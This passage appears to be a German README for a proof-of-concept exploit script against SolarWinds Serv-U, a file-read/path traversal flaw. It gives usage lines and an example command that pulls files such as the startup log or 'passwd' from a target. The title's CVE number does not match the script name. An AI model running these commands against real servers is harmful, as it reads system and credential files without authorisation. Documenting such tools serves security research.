
CVE-2024-28955 Exploitation PoC
15.4.2 oder niedriger).Um dieses Tool zu verwenden, muss Python installiert sein. Führen Sie das Skript mit den entsprechenden Argumenten aus:
python3 CVE-2024-28995.py -u <URL> [-d <Verzeichnispfad>] [-f <Dateiname>] [-w <Wortliste>]
-u, --url: Auszunutzende URL (erforderlich).
-d, --dir: Verzeichnispfad zum Dateilesen (z.B. ProgramData/RhinoSoft/Serv-U/).
-f, --file: Zu lesende Datei zum Dateilesen (z.B. Serv-U-StartupLog.txt oder passwd).
-w, --wordlist: Wortliste für zusätzliche zu testende Pfade.
Beispiel
python3 CVE-2024-28995.py -u http://example.com -d ProgramData/RhinoSoft/Serv-U/ -f Serv-U-StartupLog.txt



Referenzen
https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/